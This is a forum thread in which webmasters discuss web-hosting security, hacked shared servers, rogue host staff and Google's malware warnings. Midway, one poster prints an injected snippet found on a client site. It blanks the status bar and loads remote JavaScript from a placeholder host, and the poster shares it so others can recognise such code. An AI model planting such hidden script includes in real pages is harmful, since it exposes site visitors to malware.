4, i would have said 7 if i was asked before reading your post. :)

tool that turns Google into a vulnerability scanner

Yikes !

This really points out how important choosing a good web host is. Sometimes, it's the cheapo, "too good to be true" hosting companies that end up either injecting code or just not doing the right server patching.

Price alone isn't a guarantee of security. A couple of years ago, I had several sites on shared hosting get defaced after a server was exploited. This host was actually one of the most expensive (for shared hosting) that I used, but apparently their tech skills weren't up to snuff. After the same thing happened a couple of weeks in a row, I moved all of the sites I had hosted there.

In that case, if the hacker had just slipped in a spurious link or two instead of simply defacing the site, it might have been a while before anyone noticed.

Best way to choose a host: get recommendations from savvy webmasters with at least a year or two of experience with a host.

[edited by: rogerd at 6:24 pm (utc) on Feb. 25, 2008]

Now I am going to be unable to sleep nights!...KF

In that case, if the hacker had just slipped in a spurious link or two instead of simply defacing the site, it might have been a while before anyone noticed.

Google will notice...

How can I find out if my site has been identified as a web site that hosts or distributes malicious software and what can I do if it has?
[google.com...]

Google uses its own criteria, procedures, and tools to identify sites that host or distribute badware. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message. If you feel your site has been mistakenly identified, or if you make changes to your site so that it no longer hosts or distributes malicious software and you secure your site so that it is no longer vulnerable to the insertion of badware, you can request that your site be reviewed.

Emphasis mine above. Here is a previous topic discussing Trusted Hosting Environments from 2006-04-23, you can skip the .gov and .edu intro, the rest applies to this topic.

THE - Trusted Hosting Environments
Are you at risk in your current hosting situation?
[webmasterworld.com...]

In the past couple of years, I've come across more than a handful of instances where there was malicious code on someone's website. A quick view of the source and some of it is rather easy to identify. Many of the examples I came across sat right at the bottom of the html somewhere, at times, right after the closing </html> element. Or, there were a few lines added to an external js file, those are the ones you really need to look for. And, if you are not familiar with JavaScript, find someone who is. Use the tools available to you for scanning, validating, etc. to make sure your house is secure.

Here is one example I found during a review of a site...

[red]<SCRIPT language=javascript>
kstatus();
function kstatus(){
self.status=" ";
setTimeout('kstatus()',0);
}
</SCRIPT>
<script language="javascript" src="http://example.com/lr.js"></script>[/red]

That little script invoked some sort of ActiveX prompt when visiting those sites that contained it. The script was within an <iframe> on some obscure ccTLD (and even .com's) and had some pretty hefty encryption attached to it. I would imagine it was rather damaging to the visitor, or it tried to be. Most of the basic browser security settings are going to catch "some of these" but, "not all of them".

Its nice to see Google being Proactive in this area. They've realized that it is a major area of concern and have gone out of their way to clearly label those sites in the SERPs that may be potential malicious software distribution points. Is your site one of them?

Now I am going to be unable to sleep nights!

I don't want to cause any sort of panic. Its just something that many "SEO's" are not going to think about. They are "assuming" that the provider they've chosen is on top of all this and has provided a trusted and secure hosting environment for you and the others. As I mentioned in my opening post, you can do all the SEO by the book and a flaw and/or, multiple flaws at the server make it moot.

Those are great posts pageone !

I've had problems wiht a old host, one day he went into phpmyadmin and modified his user on my forum to become a moderator (all it took was changing the usergroup id) then I caught him at it browsing my staff room threads... within 24 hours I was elsewere. (to help prevent this happening you can setup a forum password for your staff room in most popular forum software)

A friend has also had some of his sites pages modified, were links to adult sites were added in his footer.

Our site was hacked in the past and our ISP was the one who actually figured it out and alerted us.

So I guess it can go both ways... Plus we have a dedicated server, which was even more impressive that they caught it. They were strictly analyzing the irregular data patterns to another country.

The more I research XSS exploitation, the more I learn how easy vulnerabilities are to find, and how potentially destructive they can be. Not all XSS exploits are as docile or relatively harmless as the famous Samy (aka JS.SpaceHero). AJAXified applications are an order of magnitude more exposed than traditional web apps.

I've had my AdWords account suspended a couple of times when Google discovered "malware" - which embarassingly turned out to be scripts that I myself put in place for my own custom analytics. Sure it's annoying, but it's also comforting to know that G is looking out for my user's best interests.

Security is a constant, ongoing PITA.

I have had this one particular host that meant I had a raft of problems with hacked sites and malicous code inserts, I suspect it wasnt them but hey had an insecure environment in which they ran their servers.

It last for around 4 months and hasnt happened since, thing was they denied it all....

pageoneresults, nice post about the problem but you offered no SOLUTIONS except checking out web hosts which can help but isn't flawless as any host or dedicated server is vulnerable at any given point in time.

What you need to do is be proactive and use automated monitoring tools to check your website for page changes, especially the home page.

There are some free online services, paid services and software you can download that perform this function. I'd recommend just like with server alarm monitoring that you use at least 2 different page content monitoring services just in case one is unable to access your server.

If you can get in and correct the problem before Google crawls the page again your SEO is safe.

Those are great posts pageone !

I agree! A few days of research is well worth several weeks of cure :)

I'll give my hosting provider 10 out of 10.

I host my own server, I have 2, 1 in my house, 1 in my office. Both are protected by hardware firewalls.

I'd like to see anyone still some extraneous JS in my pages.

For this ( and many other ) reasons we always host ourselves. I have over the years thought about the savings we could make if we were not our own ISP/Host but in the long run it has proved to be the right decision.

Re shared hosting from what I understand it's not necessarily the hosts fault but more a problem with not being able to provide a dedicate IP for everyone on the Internet due to a limited number of IP numbers.

I believe my Host rates a 10 because they are always upgrading their hardware and software to keep ahead of potential problems. I have over 20 clients with each on their own dedicated IP address with no problems.

I'm actually chuckling at some of the false sense of security I'm reading in some of these posts.

In a shared hosting environment, whether or not your HOST is making your site secure by upgrading isn't always as important as all of the sites on that server upgrading as well. All it takes is one WordPress or Joomla! site being hacked for the hackers to discover if they can escalate privileges and own the box.

Hopefully the hackers can just own the single hacked account, but I've seen too many servers and hosting companies completely hacked to give me any doubts one mistake is all it takes.

[edited by: incrediBILL at 12:39 am (utc) on Mar. 10, 2008]

I'm actually chuckling at some of the false sense of security I'm reading in some of these posts.

At the end of the day, if I'm still up to date,
isn't "Open BSD" the only website firewall that's
{allegedly} never been hacked?

.

At the end of the day, if I'm still up to date,
isn't "Open BSD" the only website firewall that's
{allegedly} never been hacked?

How often do you update?

All my colleagues thought I was nuts forking out £1100 a month on three managed dedicated servers. I've never had a problem in four years except for one failed DOS attack ... but I've still had to listen to all of their problems for those four years ... ;)

No. Shortly after I complained about a support personnel from my host, I notice one of my database entries changed to a terrorist-related site. Granted, it was just the title bar.. but I was pretty steamed about it at the time.

I've never had any problems with my host other than that incident. But that situation has prompted me to lock down my server's firewall with blocking ssh & ftp ports to anyone but myself.

I'm going to go out on a limb and say he got in a bit of trouble because of my complaint.. I was dumb and trusted my host too much. I didn't change the root password after dealing with them. I will assume he wrote it down and connected once he got home and did his deed.

To me, it's no different than one of my employees going verbally crazy on a customer for complaining about something they did (after running to them into a mall or something.. how can I control what they do outside of work?). So until it happens again, I will shrug it off as a one-time, unfortunate event.. that taught me a valuable lesson.

Great post pageone; thank you very much.